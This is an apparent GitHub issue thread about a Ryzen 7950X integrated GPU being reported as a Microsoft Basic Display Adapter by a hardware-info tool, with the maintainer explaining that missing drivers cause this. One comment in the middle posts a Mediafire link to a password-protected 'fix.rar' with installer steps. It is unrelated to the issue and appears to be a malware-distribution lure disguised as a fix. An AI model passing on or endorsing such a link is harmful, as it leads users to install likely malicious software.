### ISSUE TITLE
Some information missing for build-in GPU in Ryzen 7950X 3D Processor, note: no driver installed yet, just a basic one it seems.

### ISSUE THREAD

**Issue by SkybuckFlying** [turkaysoft/glow#41]
<------- GRAPHICS CARD INFORMATION ------->

Graphics Card: Microsoft Basic Display Adapter

Graphics Card Model: Microsoft Basic Display Adapter
Graphics Card Publisher: (Standard display types)
Driver Version: 10.0.22621.1
Driver Date: 21.06.2006
Graphics Card Status: Offline
Graphics Card Hardware ID: PCI\VEN_1002&DEV_164E&SUBSYS_164E1002&REV_C9
DAC Type: Unknown
DirectX Driver: nvldumdx.dll
INF File: display.inf
INF File Graphics Card Section: MSBDA
Colors Offered: 0

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by turkaysoft** [comment]
> <------- GRAPHICS CARD INFORMATION ------->
> 
> Graphics Card: Microsoft Basic Display Adapter
> 
> Graphics Card Model: Microsoft Basic Display Adapter Graphics Card Publisher: (Standard display types) Driver Version: 10.0.22621.1 Driver Date: 21.06.2006 Graphics Card Status: Offline Graphics Card Hardware ID: PCI\VEN_1002&DEV_164E&SUBSYS_164E1002&REV_C9 DAC Type: Unknown DirectX Driver: nvldumdx.dll INF File: display.inf INF File Graphics Card Section: MSBDA Colors Offered: 0

Hardware without drivers installed will not be detected correctly. It appears as a Microsoft Display Adapter.
